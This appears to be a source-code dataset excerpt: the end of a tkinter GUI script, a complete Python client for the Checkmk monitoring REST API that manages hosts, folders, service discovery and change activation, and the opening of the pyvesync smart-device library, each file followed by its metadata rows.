canvas2.grid(columnspan=4, rowspan=4)
#button = tk.Button(canvas2, text="new window",command=lambda:open_file(), bg='black', fg='#469A00', )
#button.grid(column=1, row=2)
#create button that will be placed on canvas2
browser_text2 = tk.StringVar()
browse_btn= tk.Button(canvas2, textvariable=browser_text2, command=lambda:open_file(), font="Raleway", bg="green", fg="white", height=2, width=15)
browser_text2.set("LEARN MORE")
browse_btn.grid(column=1, row=2)
#browser button 1
browser_text = tk.StringVar()
browse_btn= tk.Button(root, textvariable=browser_text, command=lambda:open_file(), font="Raleway", bg="green", fg="white", height=2, width=15)
browser_text.set("SearchbySTI")
browse_btn.grid(column=1, row=2)
def open_button():
browse_text.set("loading....")
canvas2 = tk.Canvas(root, bg="purple", width=600, height=400)
canvas2.grid(columnspan=4, rowspan=4)
#browse button 2
browse_text = tk.StringVar()
browse_btn= tk.Button(root, textvariable=browse_text, command=lambda:open_button(), font="Raleway", bg="green", fg="white", height=2, width=15)
browse_text.set("SearchbySymptoms")
browse_btn.grid(column=2, row=2)
#ending of code
root.mainloop()
| 29.493151 | 146 | 0.726893 | 328 | 2,153 | 4.70122 | 0.292683 | 0.035019 | 0.045396 | 0.055123 | 0.424773 | 0.40013 | 0.381971 | 0.350843 | 0.350843 | 0.264591 | 0 | 0.045455 | 0.111008 | 2,153 | 72 | 147 | 29.902778 | 0.760188 | 0.147701 | 0 | 0.179487 | 0 | 0 | 0.124108 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0 | 0.076923 | 0 | 0.128205 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a87b11324a134f84f44e6e28a4f413d36cb0e485 | 40,710 | py | Python | Checkmk.py | bpoje/checkmk-python-rest-api | 78d13dbdf9f0c6bb1db7d8a80db030d212406647 | [
"MIT"
] | null | null | null | Checkmk.py | bpoje/checkmk-python-rest-api | 78d13dbdf9f0c6bb1db7d8a80db030d212406647 | [
"MIT"
] | null | null | null | Checkmk.py | bpoje/checkmk-python-rest-api | 78d13dbdf9f0c6bb1db7d8a80db030d212406647 | [
"MIT"
] | null | null | null | from multiprocessing.sharedctypes import Value
import requests as req
import json as js
from Folder import Folder
from Host import *
from Changes import *
from Discover import *
from Create import *
from Delete import *
from Update import *
from GetAllFolders import *
class Checkmk:
def __init__(self, url, ca_cert, bearerAuth, site_name):
self.url = url
self.ca_cert = ca_cert
self.username = bearerAuth[0]
self.secret = bearerAuth[1]
self.site_name = site_name
self.create_session()
#Python3 switch
#self.swx={
# 200 : 'HTTP 200 OK',
# 400 : 'HTTP 400 Bad Request',
# 401 : 'HTTP 401 Unauthorized',
# 403 : 'HTTP Forbidden',
# 404 : 'HTTP Not Found',
# 500 : 'HTTP Internal Server Error'
#}
#Python3 switch
#status_code_string = self.swx.get(res.status_code, 'HTTP response string not found in switch')
#print(f'swx: {status_code_string}')
def server_url(self):
return self.url
def ca_cert(self):
return self.ca_cert
def create_session(self):
# https://docs.checkmk.com/latest/en/rest_api.html
# The REST-API supports the following methods for authentication: Bearer, Web server and Cookie
#
# Bearer or Header authentication:
# 'Bearer' means the holder of an identity. With HTTP bearer authentication, the client authenticates itself
# with the access data of a user set up on the Checkmk server. Ideally, this is the so-called automation user,
# which is provided in Checkmk for the execution of actions via an API. Bearer authentication is recommended for use in scripts.
#
# For authentication, you need the user name and the corresponding so-called "automation secret for machine accounts",
# i.e. the password for the automation user.
#
# Both items of information must be transmitted to the Checkmk server in the header of each request.
#
# In a newly-created site, the user automation will have already been created. You can find it, like other users,
# under Setup > Users. Make sure that the roles and associated permissions for the automation user are set to allow you to execute your requests.
# Create requests session object
self.s = req.Session()
self.s.headers.update({'Authorization':f'Bearer {self.username} {self.secret}', 'accept':'application/json', 'Content-Type':'application/json' })
def exec(self,url_action,req_type='GET',data=None,header=None,send=True,display_req=False,display_res=True):
#Create request
#r = req.Request('GET', cmk_rest_url + '/objects/host_config/dc-repo?effective_attributes=true')
r = req.Request(req_type, self.url + url_action, data=data)
#Prepare request based on existing session (adds headers & stuff that are defined under connection)
sr = self.s.prepare_request(r)
#Modify this header
if (header != None):
sr.headers.update(header)
#Output prepared requst:
if (display_req == True):
print('Prepared request:')
print('\tURL: ', end='')
print(sr.url)
print('\tBODY: ', end='')
print(sr.body)
print('\tHEADERS: ', end='')
print(sr.headers)
print()
#Send
res = None
if (send == True):
res = self.s.send(sr, verify=self.ca_cert)
#Response objects have a .request property which is the original PreparedRequest object that was sent.
#print('Response.request:')
#print(res.request.url)
#print(res.request.body)
#print(res.request.headers)
#print()
#Output response
if (display_res == True):
print('Response:')
print(f'\tStatus code: {res.status_code} {req.status_codes._codes[res.status_code][0]}')
print()
#print(res)
#print()
#print(res.content)
#If data not empty
print('\tRESPONSE BODY: ', end='')
if (res.content != None and len(res.content) != 0):
#res.content are bytes, decode them to produce string
dmp = js.loads(res.content.decode('utf-8'))
#Beautifying JSON output
print(js.dumps(dmp, indent=4))
print()
else:
print('No returned data')
print('\tRESPONSE HEADERS: ', end='')
print(res.headers)
return res
#Show all hosts (GET)
def host_get_all(self,send=True,display_req=False,display_res=False):
res = self.exec('/domain-types/host_config/collections/all',send=send,display_req=display_req,display_res=display_res)
if (res == None):
print('Response is None')
else:
# HTTP 200 OK
if (res.status_code == 200):
#print('\n##################################')
#print('200 OK')
#print('##################################\n')
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
dmp = js.loads(cont)
#Beautifying JSON output
#print(js.dumps(dmp, indent=4))
values = dmp['value']
hosts = []
for i in values:
id = i['id']
host = Host(id)
host.set_using_json(i)
hosts.append(host)
return hosts
else:
print('\n##################################')
print('FAILED HTTP response is not 200 OK')
print('##################################\n')
return None
#Show a host (GET)
#effective_attributes - Show all effective attributes, which affect this host, not just the attributes which were set on this host specifically. This includes all attributes of all of this host's parent folders.
def host_get(self,host_name,effective_attributes=False,send=True,display_req=False,display_res=False):
option1 = ''
if (effective_attributes == True):
option1 = '?effective_attributes=true'
res = self.exec(f'/objects/host_config/{host_name}{option1}',send=send,display_req=display_req,display_res=display_res)
if (res == None):
print('Response is None')
else:
# HTTP 200 OK
if (res.status_code == 200):
#print('\n##################################')
#print('200 OK')
#print('##################################\n')
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
#print('dmp')
#print(dmp)
#print()
#print(dmp['links'])
#Beautifying JSON output
#print()
#print(js.dumps(json_dmp, indent=4))
#print()
#print()
#print(res.headers['ETag'])
#print()
#print()
#print(json_dmp)
#print()
etag = res.headers['ETag']
host = Host(host_name)
host.set_using_json(json_dmp)
return (host, etag)
#else:
#print('\n##################################')
#print('FAILED HTTP response is not 200 OK')
#print('##################################\n')
return None
#GET /domain-types/folder_config/collections/all Show all folders
#Lists subfolders (and the hosts in subfolders) of folder x. It won't show the files that are in folder x.
#
#Get all folders in a folder (can show hosts in folder and work recursively)
#parent string - Show all sub-folders of this folder. The default is the root-folder. Path delimiters can be either ~, / or \. Please use the one most appropriate for your quoting/escaping needs. A good default choice is ~.
#recursive boolean - List the folder (default: root) and all its sub-folders recursively.
#show_hosts boolean - When set, all hosts that are stored in each folder will also be shown. On large setups this may come at a performance cost, so by default this is switched off.
def get_all_folders(self,parent,recursive=False,show_hosts=False,send=True,display_req=False,display_res=False):
if (parent == None):
raise ValueError('parent cannot be none')
parent_str = f'parent={parent}'
if (recursive == True):
recursive_str = 'recursive=true'
else:
recursive_str = 'recursive=false'
if (show_hosts == True):
show_hosts_str = 'show_hosts=true'
else:
show_hosts_str = 'show_hosts=false'
#/domain-types/folder_config/collections/all?parent=~&recursive=false&show_hosts=false
res = self.exec(f'/domain-types/folder_config/collections/all?{parent_str}&{recursive_str}&{show_hosts_str}',send=send,display_req=display_req,display_res=display_res)
if (res == None):
print('Response is None')
else:
# HTTP 200 OK
if (res.status_code == 200):
#print('\n##################################')
#print('200 OK')
#print('##################################\n')
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
#print('dmp')
#print(dmp)
#print()
#print(dmp['links'])
#Beautifying JSON output
#print()
#print(js.dumps(json_dmp, indent=4))
#print()
#print()
#print(json_dmp)
#print()
id = json_dmp['id']
domainType = json_dmp['domainType']
value = json_dmp['value']
response_header = res.headers
#print(f'id: {id}')
#print(f'domainType: {domainType}')
#print(value)
#print(len(value))
folders = []
for i in value:
#print(i)
value_id = i['id']
value_title = i['title']
value_domain_type = i['domainType']
value_extensions = i['extensions']
value_path = value_extensions['path']
value_attributes = value_extensions['attributes']
value_meta_data = value_attributes['meta_data']
value_created_at = value_meta_data['created_at']
value_updated_at = value_meta_data['updated_at']
value_created_by = value_meta_data['created_by']
hosts_in_folder = None
value_members = i['members']
if ('hosts' in value_members):
value_members_hosts = value_members['hosts']
if ('value' in value_members_hosts):
value_members_hosts_value = value_members_hosts['value']
hosts_in_folder = []
for j in value_members_hosts_value:
#print(j)
host_title = j['title']
#print(f'host_title: {host_title}')
hosts_in_folder.append(host_title)
#print(f'value_id: {value_id}')
#print(f'value_title: {value_title}')
#print(f'value_domain_type: {value_domain_type}')
#print(f'value_extensions: {value_extensions}')
#print(f'value_path: {value_path}')
#print(f'value_attributes: {value_attributes}')
#print(f'value_created_by: {value_created_by}')
#print(f'value_updated_at: {value_updated_at}')
#print(f'value_created_by: {value_created_by}')
#print()
folder = Folder(value_id, value_title, value_domain_type, value_path, value_created_at, value_updated_at, value_created_by)
folder = Folder(value_id, value_title, value_domain_type, value_path, hosts_in_folder, value_created_at, value_updated_at, value_created_by)
#print()
#folder.output(1)
#print()
folders.append(folder)
#for i in value:
# print(i)
# domainType = value['domainType']
# print(f'domainType: {domainType}')
#host = Host()
#host.set_using_json(json_dmp)
#ok = Create_ok(title,response_header,id,domain_type,members,extensions)
ok = GetAllFolders_ok(response_header, id, domainType, folders)
return GetAllFolders(res.status_code, ok)
else:
#print('\n##################################')
#print('FAILED HTTP response is not 200 OK')
#print('##################################\n')
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
#Beautifying JSON output
#print()
#print(js.dumps(json_dmp, indent=4))
#print()
title = json_dmp['title']
status = json_dmp['status']
detail = json_dmp['detail']
fields = json_dmp['fields']
response_header = res.headers
fail = GetAllFolders_fail(title,response_header,status,detail,fields)
return GetAllFolders(res.status_code, fail)
return None
#GET /objects/folder_config/{folder}/collections/hosts Show all hosts in a folder
#folder string - The path of the folder being requested. Please be aware that slashes can't be used in the URL. Also, escaping the slashes via %2f will not work. Please replace the path delimiters with the tilde character ~. Path delimiters can be either ~, / or \. Please use the one most appropriate for your quoting/escaping needs. A good default choice is ~.
def show_all_hosts(self,folder,send=True,display_req=False,display_res=False):
if (folder == None):
raise ValueError('folder cannot be none')
#/domain-types/folder_config/collections/all?parent=~&recursive=false&show_hosts=false
res = self.exec(f'/objects/folder_config/{folder}/collections/hosts',send=send,display_req=display_req,display_res=display_res)
if (res == None):
print('Response is None')
else:
# HTTP 200 OK
if (res.status_code == 200):
#print('\n##################################')
#print('200 OK')
#print('##################################\n')
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
#print('dmp')
#print(dmp)
#print()
#print(dmp['links'])
#Beautifying JSON output
#print()
#print(js.dumps(json_dmp, indent=4))
#print()
#print()
#print(json_dmp)
#print()
id = json_dmp['id']
domainType = json_dmp['domainType']
value = json_dmp['value']
response_header = res.headers
#print(f'id: {id}')
#print(f'domainType: {domainType}')
#print(value)
#print(len(value))
hosts = []
for i in value:
#print(host)
value_id = i['id']
#value_domain_type = host['domainType']
#value_title = host['title']
#value_extensions = host['extensions']
#value_extensions_attributes = value_extensions['attributes']
#value_alias = value_extensions_attributes['alias']
#value_metadata = value_extensions_attributes['meta_data']
#value_created_at = value_metadata['created_at']
#value_updated_at = value_metadata['updated_at']
#value_created_by = value_metadata['created_by']
#value_is_cluster = value_extensions['is_cluster']
#value_is_offline = value_extensions['is_offline']
#cmk_host = Host(value_id, value_title, value_folder, value_ip, value_alias)
cmk_host = Host(value_id)
cmk_host.set_using_json(i)
#cmk_host.output(1)
hosts.append(cmk_host)
#for i in value:
# print(i)
# domainType = value['domainType']
# print(f'domainType: {domainType}')
#host = Host()
#host.set_using_json(json_dmp)
#ok = Create_ok(title,response_header,id,domain_type,members,extensions)
#ok = GetAllFolders_ok(response_header, id, domainType, folders)
#return GetAllFolders(res.status_code, ok)
return hosts
else:
#print('\n##################################')
#print('FAILED HTTP response is not 200 OK')
#print('##################################\n')
#res.content are bytes, decode them to produce string
#cont = res.content.decode('utf-8')
#json_dmp = js.loads(cont)
#Beautifying JSON output
#print()
#print(js.dumps(json_dmp, indent=4))
#print()
return None
return None
# POST /objects/host/{host_name}/actions/discover_services/invoke Execute a service discovery on a host
def discover_services(self,host,mode,send=True,display_req=False,display_res=False):
#If object of class Host
if (type(host) == Host):
if (host == None or host.id == None or host.folder == None):
raise ValueError('Empty id or folder is not allowed')
host_name = host.id
#If string
elif (type(host) == str):
host_name = host
if (mode == None or ( mode != 'new' and mode != 'remove' and mode != 'fix_all' and mode != 'refresh' and mode != 'only_host_labels' )):
raise ValueError('Mode has to be one of values \'new\', \'remove\', \'fix_all\', \'refresh\' or \'only_host_labels\'')
# one of the enum values: ['new', 'remove', 'fix_all', 'refresh', 'only_host_labels']
#Build json
base = {}
base['mode'] = mode
base_data = js.dumps(base)
res = self.exec(f'/objects/host/{host_name}/actions/discover_services/invoke',req_type='POST',data=base_data,send=send,display_req=display_req,display_res=display_res)
if (res == None):
print('Response is None')
else:
# HTTP 200 OK
if (res.status_code == 200):
#print('\n##################################')
#print('200 OK')
#print('##################################\n')
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
#print('dmp')
#print(dmp)
#print()
#print(dmp['links'])
#Beautifying JSON output
#print()
#print(js.dumps(json_dmp, indent=4))
#print()
#print(dmp['id'])
#print(dmp['title'])
#print(dmp['extensions'])
#id = dmp['id']
#title = dmp['title']
#host = Host(id, title)
#print()
#print(json_dmp)
#print()
#host = Host(dmp)
#host = Host()
#host.set_using_json(dmp)
title = json_dmp['title']
id = json_dmp['id']
domain_type = json_dmp['domainType']
members = json_dmp['members']
extensions = json_dmp['extensions']
response_header = res.headers
ok = Discover_ok(title,response_header,id,domain_type,members,extensions)
return Discover(res.status_code, ok)
else:
#print('\n##################################')
#print('FAILED HTTP response is not 200 OK')
#print('##################################\n')
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
title = json_dmp['title']
status = json_dmp['status']
detail = json_dmp['detail']
response_header = res.headers
fail = Discover_fail(title,response_header,status,detail)
return Discover(res.status_code, fail)
return None
# POST /domain-types/activation_run/actions/activate-changes/invoke Activate pending changes
#def activate_changes(self,site,force_foreign_changes=False,send=True,display_req=False,display_res=False):
def activate_changes(self,force_foreign_changes=False,send=True,display_req=False,display_res=False):
site = self.site_name
str_force_foreign_changes = 'true' if force_foreign_changes == True else 'false'
data = '''{
"redirect": false,
"sites": [
"%s"
],
"force_foreign_changes": %s
}
''' % (site,str_force_foreign_changes)
res = self.exec(f'/domain-types/activation_run/actions/activate-changes/invoke',req_type='POST',data=data,send=send,display_req=display_req,display_res=display_res)
if (res == None):
print('Response is None')
else:
# HTTP 200 OK
if (res.status_code == 200):
#print('\n##################################')
#print('200 OK')
#print('##################################\n')
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
#Beautifying JSON output
#print(js.dumps(json_dmp, indent=4))
title = json_dmp['title']
id = json_dmp['id']
domain_type = json_dmp['domainType']
members = json_dmp['members']
extensions = json_dmp['extensions']
response_header = res.headers
ok = Changes_ok(title,response_header,id,domain_type,members,extensions)
return Change(res.status_code, ok)
else:
#print('\n##################################')
#print('FAILED HTTP response is not 200 OK')
#print('##################################\n')
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
title = json_dmp['title']
status = json_dmp['status']
detail = json_dmp['detail']
response_header = res.headers
fail = Changes_fail(title,response_header,status,detail)
return Change(res.status_code, fail)
return None
# PUT /objects/host_config/{host_name} Update a host
# Update a checkmk host with request body (data) as variable
# Host etag is a value that changes on every modification
#
# Examples for function parameter data:
#
# Change checkmk host parameter (don't change other parameters):
# {"update_attributes": {"tag_pumpa": "bs0050"}}
#
# Change all checkmk host parameters (any parameters not defined in body will be cleared)
# {"attributes": {"ipaddress": "192.168.0.6"}}
#
# Remove checkmk parameter (don't change other parameters):
# {"remove_attributes": ["tag_pumpa_type"]}
def update_host(self,host,data,etag,send=True,display_req=False,display_res=False):
#If object of class Host
if (type(host) == Host):
if (host == None or host.id == None or host.folder == None):
raise ValueError('Empty id or folder is not allowed')
hostname = host.id
#If string
elif (type(host) == str):
hostname = host
#Modify header to contain etag
header = {}
header['accept'] = 'application/json'
header['If-Match'] = etag
header['Content-Type'] = 'application/json'
res = self.exec(f'/objects/host_config/{hostname}',req_type='PUT',data=data,send=send,display_req=display_req,display_res=display_res,header=header)
if (res == None):
print('Response is None')
else:
# HTTP 200 OK
if (res.status_code == 200):
#print('\n##################################')
#print('200 OK')
#print('##################################\n')
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
#Beautifying JSON output
#print(js.dumps(json_dmp, indent=4))
title = json_dmp['title']
id = json_dmp['id']
domain_type = json_dmp['domainType']
members = json_dmp['members']
extensions = json_dmp['extensions']
response_header = res.headers
#ok = Changes_ok(title,response_header,id,domain_type,members,extensions)
ok = Update_ok(title,response_header,id,domain_type,members,extensions)
#return Change(res.status_code, ok)
return Update(res.status_code, ok)
else:
#print('\n##################################')
#print('FAILED HTTP response is not 200 OK')
#print('##################################\n')
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
title = json_dmp['title']
status = json_dmp['status']
detail = json_dmp['detail']
response_header = res.headers
#fail = Changes_fail(title,response_header,status,detail)
fail = Update_fail(title,response_header,status,detail)
#return Change(res.status_code, fail)
return Update(res.status_code, fail)
return None
# PUT /objects/host_config/{host_name} Update a host
# Remove tag group from host
def remove_host_tag(self,host,tag_group,send=True,display_req=False,display_res=False):
#If object of class Host
if (type(host) == Host):
if (host == None or host.id == None or host.folder == None):
raise ValueError('Empty id or folder is not allowed')
hostname = host.id
#If string
elif (type(host) == str):
hostname = host
if (tag_group == None):
raise ValueError('tag_group cannot be None')
# Define web service data
data = {}
data['remove_attributes'] = [ tag_group, ]
data = js.dumps(data)
#Get host etag (value that changes on every modification)
etag = self.get_etag(hostname)
#Call generic update call with our specific data and etag
return self.update_host(hostname,data,etag,send,display_req,display_res)
# PUT /objects/host_config/{host_name} Update a host
# Update (set new or update existing) tag
def update_host_tag(self,host,tag_group,tag_group_value,send=True,display_req=False,display_res=False):
#If object of class Host
if (type(host) == Host):
if (host == None or host.id == None or host.folder == None):
raise ValueError('Empty id or folder is not allowed')
hostname = host.id
#If string
elif (type(host) == str):
hostname = host
if (tag_group == None or tag_group_value == None):
raise ValueError('tag_group or tag_group_value cannot be None')
# Define web service data
data = {}
data['update_attributes'] = {}
data['update_attributes'][tag_group] = tag_group_value
data = js.dumps(data)
#Get host etag (value that changes on every modification)
etag = self.get_etag(hostname)
#Call generic update call with our specific data and etag
return self.update_host(hostname,data,etag,send,display_req,display_res)
# PUT /objects/host_config/{host_name} Update a host
# Remove ipaddress (resolve ip from hostname)
def remove_host_ipaddress(self,host,send=True,display_req=False,display_res=False):
#If object of class Host
if (type(host) == Host):
if (host == None or host.id == None or host.folder == None):
raise ValueError('Empty id or folder is not allowed')
hostname = host.id
#If string
elif (type(host) == str):
hostname = host
# Define web service data
data = {}
data['remove_attributes'] = [ 'ipaddress', ]
data = js.dumps(data)
#Get host etag (value that changes on every modification)
etag = self.get_etag(hostname)
#Call generic update call with our specific data and etag
return self.update_host(hostname,data,etag,send,display_req,display_res)
# PUT /objects/host_config/{host_name} Update a host
# Update (set new or update existing) ipaddress
def update_host_ipaddress(self,host,ipaddress,send=True,display_req=False,display_res=False):
#If object of class Host
if (type(host) == Host):
if (host == None or host.id == None or host.folder == None):
raise ValueError('Empty id or folder is not allowed')
hostname = host.id
#If string
elif (type(host) == str):
hostname = host
if (ipaddress == None):
raise ValueError('ipaddress cannot be None')
# Define web service data
data = {}
data['update_attributes'] = {}
data['update_attributes']['ipaddress'] = ipaddress
data = js.dumps(data)
#Get host etag (value that changes on every modification)
etag = self.get_etag(hostname)
#Call generic update call with our specific data and etag
return self.update_host(hostname,data,etag,send,display_req,display_res)
#Get host etag (value that changes on every modification)
def get_etag(self,host):
#If object of class Host
if (type(host) == Host):
if (host == None or host.id == None or host.folder == None):
raise ValueError('Empty id or folder is not allowed')
hostname = host.id
#If string
elif (type(host) == str):
hostname = host
#Get host data
host1 = self.host_get(hostname,effective_attributes=True,send=True,display_req=False,display_res=False)
#If hostname was found we also got etag value
if (host1 != None):
etag = host1[1]
#print(f'etag: {etag}')
return etag
else:
#print(f'No host {hostname} found!\n')
#Return empty string so that subsequent REST calls are going to get status 404
return ''
# POST /domain-types/host_config/collections/all Create a host
def create_host(self,host,send=True,display_req=False,display_res=False):
if (host == None or host.id == None or host.folder == None):
raise ValueError('Empty id or folder is not allowed')
#Build json
base = {}
#base['id'] = host.id #rest doesn't accept id
#base['title'] = host.title #rest doesn't accept title
base['host_name'] = host.id
base['folder'] = host.folder
if (host.ipaddress != None or host.alias != None):
attributes = {}
if (host.ipaddress != None):
attributes['ipaddress'] = host.ipaddress
if (host.alias != None):
attributes['alias'] = host.alias
#Add attributes to base in json
base['attributes'] = attributes
print('base:')
print(js.dumps(base, indent=4))
#data = '''
#{
# "folder": "%s",
# "host_name": "%s",
# "attributes": {
# "ipaddress": "192.168.0.123"
#}
#}
#''' % (host.folder,host.id)
#print('data:')
#print(data)
res = self.exec(f'/domain-types/host_config/collections/all',req_type='POST',data=js.dumps(base),send=send,display_req=display_req,display_res=display_res)
#res = None
if (res == None):
print('Response is None')
else:
# HTTP 200 OK
if (res.status_code == 200):
#print('\n##################################')
#print('200 OK')
#print('##################################\n')
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
#print('dmp')
#print(dmp)
#print()
#print(dmp['links'])
#Beautifying JSON output
#print()
#print(js.dumps(json_dmp, indent=4))
#print()
#print()
#print(json_dmp)
#print()
#print(dmp['id'])
#print(dmp['title'])
#print(dmp['extensions'])
#id = dmp['id']
#title = dmp['title']
#host = Host(id, title)
#host = Host(dmp)
title = json_dmp['title']
id = json_dmp['id']
domain_type = json_dmp['domainType']
members = json_dmp['members']
extensions = json_dmp['extensions']
response_header = res.headers
ok = Create_ok(title,response_header,id,domain_type,members,extensions)
return Create(res.status_code, ok)
#host = Host()
#host.set_using_json(json_dmp)
#return host
else:
#print('\n##################################')
#print('FAILED HTTP response is not 200 OK')
#print('##################################\n')
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
#print()
#print(js.dumps(json_dmp, indent=4))
#print()
#print()
#print(json_dmp)
#print()
title = json_dmp['title']
status = json_dmp['status']
detail = json_dmp['detail']
fields = json_dmp['fields']
response_header = res.headers
fail = Create_fail(title,response_header,status,detail,fields)
return Create(res.status_code, fail)
return None
# DELETE /objects/host_config/{host_name} Delete a host
def delete_host(self,host,send=True,display_req=False,display_res=False):
if (host == None or host.id == None or host.folder == None):
raise ValueError('Empty id or folder is not allowed')
#print('host_id')
#print(host.id)
#header = {'accept':'application/json', 'Content-Type':'application/json' }
#header = {'accept':'*/*'}
res = self.exec(f'/objects/host_config/{host.id}',req_type='DELETE',data=None,send=send,display_req=display_req,display_res=display_res)
#print('res')
#print(res)
#print('status_code:')
#print(res.status_code)
if (res == None):
print('Response is None')
else:
# HTTP 204 (No Content: Operation done successfully. No further output.)
if (res.status_code == 204):
#print('\n##################################')
#print('204 (No Content: Operation done successfully. No further output.)')
#print('##################################\n')
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
#if (len(cont) == 0):
# print('Returned zero string')
#else:
# print('Returned non zero string')
#print()
#print('cont:')
#print(cont)
#print(len(cont))
#print(cont == None)
#json_dmp = js.loads(cont)
#print('dmp')
#print(dmp)
#print()
#print(dmp['links'])
#Beautifying JSON output
#print('json_dmp:')
#print(js.dumps(json_dmp, indent=4))
#print()
#print('json_dmp:')
#print(json_dmp)
#print()
#print(dmp['id'])
#print(dmp['title'])
#print(dmp['extensions'])
#id = dmp['id']
#title = dmp['title']
#host = Host(id, title)
#host = Host(dmp)
#print()
#print(res.headers)
#print()
title = ''
response_header = ''
if (len(cont) == 0):
#print('Returned only header')
title = '204 No Content: Operation done successfully. No further output.'
response_header = res.headers
else:
raise ValueError('Returned data and header. Not defined')
ok = Delete_ok(title,response_header)
return Delete(res.status_code, ok)
#host = Host()
#host.set_using_json(json_dmp)
#return host
else:
#print('\n##################################')
#print('FAILED HTTP response is not 204 (No Content: Operation done successfully. No further output.)')
#print('##################################\n')
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
#print('json_dmp:')
#print(js.dumps(json_dmp, indent=4))
#print()
#print('json_dmp:')
#print(json_dmp)
#print()
title = json_dmp['title']
status = json_dmp['status']
detail = json_dmp['detail']
fields = json_dmp['fields']
response_header = res.headers
fail = Delete_fail(title,response_header,status,detail,fields)
return Delete(res.status_code, fail)
return None
| 37.590028 | 366 | 0.51383 | 4,402 | 40,710 | 4.614721 | 0.087233 | 0.031702 | 0.017919 | 0.0159 | 0.645269 | 0.614699 | 0.570592 | 0.555134 | 0.527223 | 0.495127 | 0 | 0.008081 | 0.352542 | 40,710 | 1,082 | 367 | 37.624769 | 0.762615 | 0.308892 | 0 | 0.517564 | 0 | 0.002342 | 0.097364 | 0.022854 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044496 | false | 0 | 0.025761 | 0.004684 | 0.152225 | 0.0726 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a87d783d0d8d9218226e9274f60f229d28223902 | 11,287 | py | Python | src/pyvesync/vesync.py | RedbeardWally/pyvesync | c41eb8a77e68cc357f558e4fa413e42f9ba68658 | [
"MIT"
] | null | null | null | src/pyvesync/vesync.py | RedbeardWally/pyvesync | c41eb8a77e68cc357f558e4fa413e42f9ba68658 | [
"MIT"
] | null | null | null | src/pyvesync/vesync.py | RedbeardWally/pyvesync | c41eb8a77e68cc357f558e4fa413e42f9ba68658 | [
"MIT"
] | null | null | null | """VeSync API Device Libary."""
import logging
import re
import time
from itertools import chain
from typing import Tuple
from pyvesync.helpers import Helpers
from pyvesync.vesyncbasedevice import VeSyncBaseDevice
from pyvesync.vesyncbulb import * # noqa: F403, F401
import pyvesync.vesyncbulb as bulb_mods
from pyvesync.vesyncfan import * # noqa: F403, F401
import pyvesync.vesyncfan as fan_mods
from pyvesync.vesyncoutlet import * # noqa: F403, F401
import pyvesync.vesyncoutlet as outlet_mods
from pyvesync.vesyncswitch import * # noqa: F403, F401
import pyvesync.vesyncswitch as switch_mods
logger = logging.getLogger(__name__)
API_RATE_LIMIT: int = 30
DEFAULT_TZ: str = 'America/New_York'
DEFAULT_ENER_UP_INT: int = 21600
def object_factory(dev_type, config, manager) -> Tuple[str, VeSyncBaseDevice]:
"""Get device type and instantiate class."""
def fans(dev_type, config, manager):
fan_cls = fan_mods.fan_modules[dev_type] # noqa: F405
fan_obj = getattr(fan_mods, fan_cls)
return 'fans', fan_obj(config, manager)
def outlets(dev_type, config, manager):
outlet_cls = outlet_mods.outlet_modules[dev_type] # noqa: F405
outlet_obj = getattr(outlet_mods, outlet_cls)
return 'outlets', outlet_obj(config, manager)
def switches(dev_type, config, manager):
switch_cls = switch_mods.switch_modules[dev_type] # noqa: F405
switch_obj = getattr(switch_mods, switch_cls)
return 'switches', switch_obj(config, manager)
def bulbs(dev_type, config, manager):
bulb_cls = bulb_mods.bulb_modules[dev_type] # noqa: F405
bulb_obj = getattr(bulb_mods, bulb_cls)
return 'bulbs', bulb_obj(config, manager)
if dev_type in fan_mods.fan_modules: # type: ignore # noqa: F405
type_str, dev_obj = fans(dev_type, config, manager)
elif dev_type in outlet_mods.outlet_modules: # type: ignore # noqa: F405
type_str, dev_obj = outlets(dev_type, config, manager)
elif dev_type in switch_mods.switch_modules: # type: ignore # noqa: F405
type_str, dev_obj = switches(dev_type, config, manager)
elif dev_type in bulb_mods.bulb_modules: # type: ignore # noqa: F405
type_str, dev_obj = bulbs(dev_type, config, manager)
else:
logger.debug('Unknown device named %s model %s',
config.get('deviceName', ''),
config.get('deviceType', '')
)
type_str = 'unknown'
dev_obj = None
return type_str, dev_obj
class VeSync: # pylint: disable=function-redefined
"""VeSync API functions."""
def __init__(self, username, password, time_zone=DEFAULT_TZ, debug=False):
"""Initialize VeSync class with username, password and time zone."""
self.debug = debug
if debug:
logger.setLevel(logging.DEBUG)
self.username = username
self.password = password
self.token = None
self.account_id = None
self.devices = None
self.enabled = False
self.update_interval = API_RATE_LIMIT
self.last_update_ts = None
self.in_process = False
self._energy_update_interval = DEFAULT_ENER_UP_INT
self._energy_check = True
self._dev_list = {}
self.outlets = []
self.switches = []
self.fans = []
self.bulbs = []
self.scales = []
self._dev_list = {
'fans': self.fans,
